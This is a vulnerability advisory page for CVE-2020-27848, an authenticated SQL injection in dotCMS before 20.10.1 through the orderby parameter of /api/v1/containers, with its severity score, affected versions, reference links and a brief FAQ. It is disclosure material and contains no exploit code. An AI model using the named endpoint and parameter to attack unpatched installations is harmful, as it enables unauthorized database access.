Vulnerability Description
dotCMS before 20.10.1 allows SQL injection, as demonstrated by the /api/v1/containers orderby parameter. The PaginatorOrdered classes that are used to paginate results of a REST endpoints do not sanitize the orderBy parameter and in some cases it is vulnerable to SQL injection attacks. A user must be an authenticated manager in the dotCMS system to exploit this vulnerability.
CVSS Score
HIGH
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Dotcms | Dotcms | < 20.10.1 |
Related Weaknesses (CWE)
References
- https://github.com/dotCMS/core/compare/v5.3.8.1...v20.10.1PatchThird Party Advisory
- https://github.com/dotCMS/core/issues/19500ExploitThird Party Advisory
- https://github.com/dotCMS/core/compare/v5.3.8.1...v20.10.1PatchThird Party Advisory
- https://github.com/dotCMS/core/issues/19500ExploitThird Party Advisory
FAQ
What is CVE-2020-27848?
CVE-2020-27848 is a vulnerability with a CVSS score of 8.8 (HIGH). dotCMS before 20.10.1 allows SQL injection, as demonstrated by the /api/v1/containers orderby parameter. The PaginatorOrdered classes that are used to paginate results of a REST endpoints do not sanit...
How severe is CVE-2020-27848?
CVE-2020-27848 has been rated HIGH with a CVSS base score of 8.8/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2020-27848?
Check the references section above for vendor advisories and patch information. Affected products include: Dotcms Dotcms.